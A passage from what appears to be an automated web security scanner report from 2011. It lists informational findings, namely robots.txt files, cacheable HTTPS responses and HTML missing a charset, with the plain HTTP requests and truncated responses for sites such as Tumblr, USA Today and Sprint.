26.132. http://www.tumblr.com/share

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tumblr.com
Path:   /share

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tumblr.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:28:30 GMT
Server: Apache
P3P: CP="ALL ADM DEV PSAi COM OUR OTRo STP IND ONL"
Cache-Control: public
Last-Modified: Fri, 15 Apr 2011 22:13:30 GMT
ETag: e41af6952088ad3ee1554a19625af35b
Expires: Mon, 05 Sep 2011 01:28:30 GMT
Pragma:
Vary: Accept-Encoding
X-Tumblr-Usec: D=22076
Content-Length: 74
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /radar
Disallow: /audio_file
Disallow: /dashboard

26.133. http://www.usatoday.com/community/profile.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /community/profile.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 24 Sep 2010 18:31:42 GMT
Accept-Ranges: bytes
ETag: "0fbccbb165ccb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 01:28:33 GMT
Connection: close
Content-Length: 1660

# robots.txt for http://www.usatoday.com
sitemap: http://www.usatoday.com/USAToday_sitemap.xml
User-agent:*
Disallow:/feedback
Disallow:/HTML
Disallow:/html
Disallow:/cgi-bin
Disallow:/system

...[SNIP]...

26.134. http://www.wisdomtree.com/bannerads/dyneld2010fall/dyneld2010falllp.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wisdomtree.com
Path:   /bannerads/dyneld2010fall/dyneld2010falllp.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wisdomtree.com

Response

HTTP/1.1 200 OK
Content-Length: 92
Content-Type: text/plain
Last-Modified: Wed, 16 Jun 2010 19:39:36 GMT
Accept-Ranges: bytes
ETag: "404ea78bdcb1:4c1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:29:25 GMT
Connection: close

User-agent: *
Disallow: /_Archive/
Disallow: /admin/
Disallow: /css/
Disallow: /scripts/

26.135. http://www.wunderground.com/auto/sacbeeXML/geo/WXCurrentObXML/index.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wunderground.com
Path:   /auto/sacbeeXML/geo/WXCurrentObXML/index.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wunderground.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:28:36 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
Last-Modified: Sat, 18 Jun 2011 19:12:34 GMT
Accept-Ranges: bytes
Content-Length: 27683
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /AS5000/
Disallow: /history/
Disallow: /geo/
Disallow: /ndfdimagery/
Disallow: /weatherstation/
Disallow: /auto/927/weatherstation/
Disallow: /auto/1000tourtemplate/weatherstat
...[SNIP]...

26.136. http://www.youtube.com/results

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /results

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 01:28:37 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 18:22:34 GMT
ETag: "21b-4abe5541eae80"
Accept-Ranges: bytes
Content-Length: 539
Vary: Accept-Encoding
Content-Type: text/plain

# robots.txt file for YouTube
# Created in the distant future (the year 2000) after
# the robotic uprising of the mid 90's which wiped out all humans.

User-agent: Mediapartners-Google*
Disallow:

Use
...[SNIP]...

26.137. http://www.zvents.com/images/internal/5/6/5/2/img_13432565_thumb.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zvents.com
Path:   /images/internal/5/6/5/2/img_13432565_thumb.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zvents.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 04 Sep 2011 01:00:47 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss
X-Runtime: 4
ETag: "8b580e35dacd6e1e6a353511cb096412"
Cache-Control: must-revalidate, private, max-age=0
Content-Length: 569
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNzI5NjJmMTIwYjA1ZWJkZjRjYTFiZDEyOGJmM2IzZWMiDWxvY2F0aW9uew0iCWNpdHkiElNhbiBGcmFuY2lzY28iC3JhZGl1c2lQIg1sYXRpdHVkZWYaMzcuNzY4MzAwMDAwMDAwMDA0AMInIhNkaXNwbGF5X3N0cmluZyIWU2FuIEZyYW5jaXNjbywgQ0EiDXRpbWV6b25lIg9VUy9QYWNpZmljIgxjb3VudHJ5IhJVbml0ZWQgU3RhdGVzIg5sb25naXR1ZGVmGy0xMjIuNDI0MDAwMDAwMDAwMDEAYEIiCnN0YXRlIgdDQQ%3D%3D--b3f37ffc54d0c61cbd071c11a1a76e1ea5894105; path=/; expires=Sun, 04-Dec-2011 01:00:47 GMT; HttpOnly

User-agent: *
Disallow: /javascripts
Disallow: /rss
Disallow: /rss*
Disallow: /ical
Disallow: /ical*
Disallow: /json
Disallow: /json*
Disallow: /partners
Disallow: /partners*
Disallow: /user/
Disallow
...[SNIP]...

27. Cacheable HTTPS response
There are 8 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


27.1. https://cdns.gigya.com/gs/SafariIDsProxy.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdns.gigya.com
Path:   /gs/SafariIDsProxy.htm

Request

GET /gs/SafariIDsProxy.htm HTTP/1.1
Host: cdns.gigya.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sun, 24 Jul 2011 14:02:54 GMT
ETag: "0bbed61a4acc1:0"
Server: Microsoft-IIS/7.5
X-Server: web501
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
Cache-Control: max-age=86400
Date: Sun, 04 Sep 2011 01:22:14 GMT
Content-Length: 4804
Connection: close

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title></title>
   <s
...[SNIP]...

27.2. https://maps-api-ssl.google.com/maps

Summary

Severity:   Information
Confidence:   Certain
Host:   https://maps-api-ssl.google.com
Path:   /maps

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:51 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="Find local businesses, vie
...[SNIP]...

27.3. https://observ.subscribeobserver.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://observ.subscribeobserver.com
Path:   /

Request

GET / HTTP/1.1
Host: observ.subscribeobserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 01:25:42 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Circulation - CharlotteObserver.com</title>
<link href="h
...[SNIP]...

27.4. https://socialize.gigya.com/gs/bookmark.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://socialize.gigya.com
Path:   /gs/bookmark.aspx

Request

GET /gs/bookmark.aspx HTTP/1.1
Host: socialize.gigya.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-XSS-Protection: 0
X-AspNet-Version: 2.0.50727
X-Server: web503
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
Date: Sun, 04 Sep 2011 01:24:15 GMT
Connection: close
Content-Length: 2076


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Sharing..
...[SNIP]...

27.5. https://subscriberservices.mcclatchy.com/char/transactiontype.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://subscriberservices.mcclatchy.com
Path:   /char/transactiontype.asp

Request

GET /char/transactiontype.asp HTTP/1.1
Host: subscriberservices.mcclatchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 01:24:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 15086
Content-Type: text/html
Cache-control: private


<html>
<head>
   <LINK rel="stylesheet" type="text/css" href="SSheet1.css">
   <TITLE></TITLE>
<script LANGUAGE="JavaScript">
function WM_netscapeCssFix()
{
/*
Source: Webmonkey Code Lib
...[SNIP]...

27.6. https://www.sprint.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /

Request

GET / HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=sprint&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:01:50 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 16842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...

27.7. https://www.sprint.net/external_videos/pages.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /external_videos/pages.php

Request

GET /external_videos/pages.php HTTP/1.1
Host: www.sprint.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:27:59 GMT
Server: Apache/2.2.4 (Unix)
Content-Length: 2539
Connection: close
Content-Type: text/html

...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
       <title>T
...[SNIP]...

27.8. https://www.sprint.net/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /index.php

Request

GET /index.php HTTP/1.1
Host: www.sprint.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:27:57 GMT
Server: Apache/2.2.4 (Unix)
Connection: close
Content-Type: text/html
Content-Length: 16851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...

28. HTML does not specify charset
There are 33 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


28.1. http://a.lingospot.com/pv_error/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.lingospot.com
Path:   /pv_error/

Request

GET /pv_error/ HTTP/1.1
Host: a.lingospot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 01:21:06 GMT
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Server: lingo
Content-Length: 345
Connection: Close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

28.2. http://a.tribalfusion.com/j.ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Request

GET /j.ad HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
X-Function: 409
X-Reuse-Index: 1
Content-Type: text/html
Content-Length: 140
Connection: Close

<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found </h1>The requested url was not found on this server.
</body></html>

28.3. http://ad.doubleclick.net/clk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Request

GET /clk HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Error: Not a valid request
Content-Type: text/html
Content-Length: 45
Date: Sun, 04 Sep 2011 01:21:46 GMT
Server: GFE/2.0
Connection: close

<h1>Error 500 Error: Not a valid request</h1>

28.4. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88303-3335-5

Request

GET /ad/js/13966-88303-3335-5?mpt=1119678&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/x%3B245665919%3B0-0%3B1%3B43087964%3B3454-728/90%3B43451397/43469184/1%3B%3B%7Eokv%3D%3Btype%3Dleaderboard%3Bsz%3D728x90%3Btile%3D1%3Bvbc%3Dcfa%3BarticleID%3DUSTRE78222D20110903%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo3=3484:36959; mojo2=3484:8030

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 517
Date: Sun, 04 Sep 2011 00:45:20 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/3/0/*/x;245665919;0-0;1;43087964;3454-728/90;43451397/43469184/1;;~okv=;type=leaderboard;sz=728x90;tile=1;vbc=cfa;art
...[SNIP]...

28.5. http://api.js-kit.com/v1/count

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.js-kit.com
Path:   /v1/count

Request

GET /v1/count HTTP/1.1
Host: api.js-kit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 502 Bad Gateway
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>502 Bad Gateway</h1>
The server returned an invalid or incomplete response.
</body></html>

28.6. http://c.brightcove.com/services/messagebroker/amf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/messagebroker/amf

Request

GET /services/messagebroker/amf HTTP/1.1
Host: c.brightcove.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 04 Sep 2011 01:22:04 GMT
Server:
Content-Length: 27076

<html>
<head>
<title>gobbles!</title>
</head>
<body>
This turkey likes to eat.
This turkey likes to eat.
This turkey likes to eat.
This turkey likes to eat.
This turkey likes to eat.
This tu
...[SNIP]...

28.7. http://c5.zedo.com/ads2/f/722607/3840/0/0/305000825/305000825/0/305/263/zz-V1-pop1304968607137.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c5.zedo.com
Path:   /ads2/f/722607/3840/0/0/305000825/305000825/0/305/263/zz-V1-pop1304968607137.html

Request

GET /ads2/f/722607/3840/0/0/305000825/305000825/0/305/263/zz-V1-pop1304968607137.html HTTP/1.1
Host: c5.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Last-Modified: Thu, 01 Sep 2011 07:25:45 GMT
Content-Type: text/html
Cache-Control: max-age=2354580
Expires: Sat, 01 Oct 2011 07:25:05 GMT
Date: Sun, 04 Sep 2011 01:22:05 GMT
Content-Length: 1443
Connection: close

<html>
<head><title>Advertisement</title>
<script language='JavaScript'>
var zd_params = new Array();
var zd_params_len = 0;
function zd_getParam(zp_label){
if (zd_params_len < 1){
var zl_qry = '' + w
...[SNIP]...

28.8. https://cdns.gigya.com/gs/SafariIDsProxy.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdns.gigya.com
Path:   /gs/SafariIDsProxy.htm

Request

GET /gs/SafariIDsProxy.htm HTTP/1.1
Host: cdns.gigya.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sun, 24 Jul 2011 14:02:54 GMT
ETag: "0bbed61a4acc1:0"
Server: Microsoft-IIS/7.5
X-Server: web501
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
Cache-Control: max-age=86400
Date: Sun, 04 Sep 2011 01:22:14 GMT
Content-Length: 4804
Connection: close

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title></title>
   <s
...[SNIP]...

28.9. http://content.usatoday.com/asp/uas3/uasSignedOut.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /asp/uas3/uasSignedOut.htm

Request

GET /asp/uas3/uasSignedOut.htm HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowserSniffer=navigator.type%3D4%3B%0Anavigator.version%3D535.1%3B%0Anavigator.os%3D%22undefined%22%3B%0Anavigator.jsVersion%3D1.6%3B%0Anavigator.vbScriptEnabled%3Dfalse%3B%0A; s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:42:27 GMT
Content-Length: 388

<div class="uasPageElement uasSignedOut">
<span class="uasGreeting">Join USA TODAY &nbsp;</span>
<span class="uasPageControls">
<a class="uasSignIn" href="#SignIn">Sign in</a>
|
<
...[SNIP]...

28.10. http://content.usatoday.com/quickquestion/jquery/1.0.1.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /quickquestion/jquery/1.0.1.html

Request

GET /quickquestion/jquery/1.0.1.html HTTP/1.1
Host: content.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11774
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSSQQCBBA=DNBPNDFBIOJCBKPGCEBKCEBJ; path=/
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 01:22:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <script t
...[SNIP]...

28.11. http://cti.w55c.net/ct/rubicon-cms2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cti.w55c.net
Path:   /ct/rubicon-cms2.html

Request

GET /ct/rubicon-cms2.html HTTP/1.1
Host: cti.w55c.net
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=6291/9346
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=3600
Content-Type: text/html
Date: Sun, 04 Sep 2011 01:01:59 GMT
Expires: Sun, 04 Sep 2011 02:01:59 GMT
Last-Modified: Wed, 03 Aug 2011 19:13:53 GMT
Server: ECS (sjo/5256)
X-Cache: HIT
Content-Length: 2622

<html>
<head>
</head>
<body>
<script type="text/javascript">

var cookie='wfivefivec',
   domain='w55c.net',
   cookiePrefix='match',
   pingURL='http://i.w55c.net/ping_match.gif?ei=RUBICON_MATCH',
...[SNIP]...

28.12. http://grfx.cstv.com/schools/nd/data/xml/auctions/m-footbl.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://grfx.cstv.com
Path:   /schools/nd/data/xml/auctions/m-footbl.xml

Request

GET /schools/nd/data/xml/auctions/m-footbl.xml?2726723552 HTTP/1.1
Host: grfx.cstv.com
Proxy-Connection: keep-alive
Referer: http://grfx.cstv.com/schools/cbs/store/08_oas_auctionsportal.swf?3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Server: lighttpd/1.4.19
Date: Sun, 04 Sep 2011 00:54:14 GMT
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

28.13. http://grfx.cstv.com/schools/nd/graphics/nd-09-bsi-video.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://grfx.cstv.com
Path:   /schools/nd/graphics/nd-09-bsi-video.jpg

Request

GET /schools/nd/graphics/nd-09-bsi-video.jpg HTTP/1.1
Host: grfx.cstv.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Server: lighttpd/1.4.19
Cache-Control: max-age=7776000
Date: Sun, 04 Sep 2011 00:45:52 GMT
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

28.14. http://grfx.cstv.com/schools/nd/graphics/nd-09-btn-bsi-.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://grfx.cstv.com
Path:   /schools/nd/graphics/nd-09-btn-bsi-.gif

Request

GET /schools/nd/graphics/nd-09-btn-bsi-.gif HTTP/1.1
Host: grfx.cstv.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Server: lighttpd/1.4.19
Cache-Control: max-age=7776000
Date: Sun, 04 Sep 2011 00:45:29 GMT
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

28.15. http://grfx.cstv.com/schools/nd/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://grfx.cstv.com
Path:   /schools/nd/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif

Request

GET /schools/nd/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif HTTP/1.1
Host: grfx.cstv.com
Proxy-Connection: keep-alive
